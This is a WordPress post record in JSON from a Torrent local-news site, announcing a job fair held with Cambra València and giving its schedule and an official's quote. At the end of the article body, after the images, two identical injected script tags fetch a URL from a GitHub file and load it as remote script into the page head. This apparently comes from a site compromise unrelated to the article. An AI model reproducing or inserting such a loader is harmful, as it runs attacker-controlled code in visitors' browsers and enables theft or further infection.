{"id":74625,"date":"2024-12-10T11:41:13","date_gmt":"2024-12-10T10:41:13","guid":{"rendered":"https:\/\/infotorrent.es\/uncategorized\/torrent-colabora-con-la-camara-valencia-en-feriaempleo\/"},"modified":"2025-01-21T01:38:08","modified_gmt":"2025-01-21T00:38:08","slug":"torrent-colabora-con-la-camara-valencia-en-feriaempleo","status":"publish","type":"post","link":"https:\/\/infotorrent.es\/ca\/ayuntamiento-de-torrent-ca\/torrent-colabora-con-la-camara-valencia-en-feriaempleo\/","title":{"rendered":"Torrent col\u00b7labora amb la Cambra Val\u00e8ncia en \u2018feriaempleo\u2019"},"content":{"rendered":"\n<p><strong>Un espai per a la formaci\u00f3 i busca d&#8217;ocupaci\u00f3<\/strong><\/p>\n\n\n\n<p><strong>Se celebrar\u00e0 el 12 de desembre en l&#8217;Antic Mercat<\/strong><\/p>\n\n\n\n<p><strong>Inscripcions en\u00a0feriaempleovalencia.com<\/strong><\/p>\n\n\n\n<p>L&#8217;ajuntament de Torrent, a trav\u00e9s d&#8217;IDEA\u2019T, col\u00b7labora amb la Cambra Val\u00e8ncia en \u2018feriempleo\u2019, que se celebrar\u00e0 el 12 de desembre en l&#8217;Antic Mercat Torrent (carrer Cervantes,1) de 9.00 a 14.00 hores.<\/p>\n\n\n\n<p>Una jornada clau per a la formaci\u00f3 i la busca d&#8217;ocupaci\u00f3. Esta trobada, dirigit tant a persones en busca activa d&#8217;ocupaci\u00f3 com a aquells interessats a millorar les seues compet\u00e8ncies laborals, oferix una plataforma \u00fanica per a connectar a demandants d&#8217;ocupaci\u00f3 amb empreses i experts del mercat laboral, en un entorn din\u00e0mic i ple d&#8217;oportunitats.<\/p>\n\n\n\n<p>Un espai per al creixement personal i professional<\/p>\n\n\n\n<p>El F\u00f2rum d&#8217;Ocupaci\u00f3 no \u00e9s nom\u00e9s un lloc per a buscar treball, sin\u00f3 tamb\u00e9 un espai dedicat a l&#8217;aprenentatge i al desenrotllament personal.<\/p>\n\n\n\n<p>A trav\u00e9s d&#8217;una confer\u00e8ncies, tallers i xarrades d&#8217;empreses, els assistents tenen l&#8217;oportunitat d&#8217;adquirir ferramentes essencials per a destacar en un entorn laboral cada vegada m\u00e9s competitiu.<\/p>\n\n\n\n<p>L&#8217;esdeveniment compta amb la participaci\u00f3 de destacats ponents de l&#8217;\u00e0mbit empresarial, acad\u00e8mic i de recursos humans, els qui compartixen la seua experi\u00e8ncia i coneixements a trav\u00e9s d&#8217;una confer\u00e8ncia, un taller i xarrades. Estes xarrades aborden temes clau, com les tend\u00e8ncies actuals del mercat laboral, la import\u00e0ncia del perfil a l&#8217;hora de contractar.<\/p>\n\n\n\n<p>Programa \u2018Enlaira 2024. Millorant l&#8217;Univers laboral\u2019<\/p>\n\n\n\n<p>9.00-9.30 hores: Recepci\u00f3<\/p>\n\n\n\n<p>Presentadora Iris Lezcano, Actriu i Presentadora<\/p>\n\n\n\n<p>9.30-10.00 hores: Benvinguda i presentaci\u00f3 Institucional (Cambra Val\u00e8ncia, Ajuntament de Torrent, Diputaci\u00f3 de Val\u00e8ncia)<\/p>\n\n\n\n<p>10.00-11.00 hores:&nbsp;CONFER\u00c8NCIA&nbsp;Joan Ruiz&nbsp;(@esmorzaret)&nbsp;Planner, Director Creatiu i Creador de Contingut. Fundador d&#8217;Esmorzaret Creative Agency<\/p>\n\n\n\n<p>11.00-11.30 hores: Pausa<\/p>\n\n\n\n<p>11.30-12.30 hores:&nbsp;TALLER DOCENT Berni Mir, Publicista, Traductor i Desenrotllador Web<\/p>\n\n\n\n<p>12.30-14.00 hores:&nbsp;\u201cA la recerca de talent, qu\u00e8 valoren les empreses?\u201d.&nbsp;Grans empreses impartiran xarrades on compartiran quines qualitats busquen en els perfils a l&#8217;hora de contractar.<\/p>\n\n\n\n<p>La regidora d&#8217;Ocupaci\u00f3, Sandra Fas, ha subratllat&nbsp;\u201cla import\u00e0ncia de la col\u00b7laboraci\u00f3 de l&#8217;Ajuntament de Torrent i la Cambra Val\u00e8ncia en l&#8217;organitzaci\u00f3 d&#8217;este esdeveniment per als ciutadans de Torrent, oferint-los ferramentes i oportunitats per a millorar les seues condicions laborals. Este tipus d&#8217;iniciatives busca una implicaci\u00f3 activa entre els ciutadans i les oportunitats laborals. El F\u00f2rum d&#8217;Ocupaci\u00f3 reflectix el comprom\u00eds de l&#8217;ajuntament amb el desenrotllament personal dels ve\u00efns de Torrent, en un m\u00f3n laboral en constant canvi, \u00e9s necessari preparar a les persones enfront dels reptes futurs i tamb\u00e9 per a potenciar el talent local\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"1024\" src=\"https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/12\/Feria-Empleo-Torrent-1-1024x1024.png\" alt=\"\" class=\"wp-image-74618\" srcset=\"https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/12\/Feria-Empleo-Torrent-1-1024x1024.png 1024w, https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/12\/Feria-Empleo-Torrent-1-300x300.png 300w, https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/12\/Feria-Empleo-Torrent-1-150x150.png 150w, https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/12\/Feria-Empleo-Torrent-1-768x768.png 768w, https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/12\/Feria-Empleo-Torrent-1-700x700.png 700w, https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/12\/Feria-Empleo-Torrent-1.png 1080w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"1024\" src=\"https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/12\/Feria-Empleo-Torrent-2-1024x1024.png\" alt=\"\" class=\"wp-image-74620\" srcset=\"https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/12\/Feria-Empleo-Torrent-2-1024x1024.png 1024w, https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/12\/Feria-Empleo-Torrent-2-300x300.png 300w, https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/12\/Feria-Empleo-Torrent-2-150x150.png 150w, https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/12\/Feria-Empleo-Torrent-2-768x768.png 768w, https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/12\/Feria-Empleo-Torrent-2-700x700.png 700w, https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/12\/Feria-Empleo-Torrent-2.png 1080w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script><script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script>","protected":false},"excerpt":{"rendered":"<p>Un espai per a la formaci\u00f3 i busca d&#8217;ocupaci\u00f3 Se celebrar\u00e0 el 12 de desembre en l&#8217;Antic Mercat Inscripcions en\u00a0feriaempleovalencia.com L&#8217;ajuntament de Torrent, a trav\u00e9s d&#8217;IDEA\u2019T, col\u00b7labora amb la Cambra Val\u00e8ncia en \u2018feriempleo\u2019, que se celebrar\u00e0 el 12 de desembre en l&#8217;Antic Mercat Torrent (carrer Cervantes,1) de 9.00 a 14.00 hores. Una jornada clau per [&hellip;]<\/p>\n","protected":false},"author":15,"featured_media":74629,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[1190,1205,1212],"tags":[],"class_list":["post-74625","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ayuntamiento-de-torrent-ca","category-comercio-mercados-y-empleo-ca","category-formacion-ca"],"acf":[],"_links":{"self":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts\/74625","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/comments?post=74625"}],"version-history":[{"count":3,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts\/74625\/revisions"}],"predecessor-version":[{"id":76281,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts\/74625\/revisions\/76281"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/media\/74629"}],"wp:attachment":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/media?parent=74625"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/categories?post=74625"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/tags?post=74625"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}